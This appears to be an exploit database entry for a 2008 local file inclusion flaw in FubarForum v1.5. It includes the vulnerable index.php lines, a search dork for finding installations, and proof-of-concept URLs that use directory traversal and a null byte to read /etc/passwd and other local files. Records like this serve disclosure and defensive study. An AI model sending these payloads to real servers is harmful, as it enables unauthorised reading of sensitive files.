header-logo
Suggest Exploit
vendor:
FubarForum v1.5
by:
cOndemned
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: FubarForum v1.5
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

FubarForum v1.5 Local File Inclusion Vulnerability

FubarForum v1.5 is vulnerable to a local file inclusion vulnerability. This vulnerability is due to the application not properly sanitizing user-supplied input to the 'page' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request containing directory traversal characters to the vulnerable script. This can allow the attacker to include arbitrary local files from the web server, such as the web server's 'etc/passwd' file, resulting in the disclosure of sensitive information.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized. Additionally, web server access control lists should be used to restrict access to sensitive files.
Source

Exploit-DB raw data:

###################################################################################
#
#   Name   : FubarForum v1.5 Local File Inclusion Vulnerability
#   Author : cOndemned
#   Dork   : for ex. "Powered by FubarForum v1.5"
#   Greetz : TBH, GregStar, ZaBeaTy, irk4z, Hawk, Sandtalker & Avantura ;*
#
###################################################################################

Source :

    // index.php

    5.  if (!empty($_GET['page'])) { $page = $_GET['page']; }       // <---- $page is being sended using GET method

    91. if (file_exists("./".$page.".php")) {       // <---- if only the file exists and we can use null byte (%00)
    
    98. include("./".$page.".php");                 // <---- our file will be included here :))
    
PoC :
    
    http://[host]/[fubarforum_path]/index.php?page=../../../../etc/passwd%00
    http://[host]/[fubarforum_path]/index.php?page=../../../../[local_file]%00
    
###################################################################################
#
#   Together We stand tall, not gonna crash, not gonna fall - Children of Bodom
#
###################################################################################

# milw0rm.com [2008-06-20]

Navigation

Suggest Exploit

Services By CQR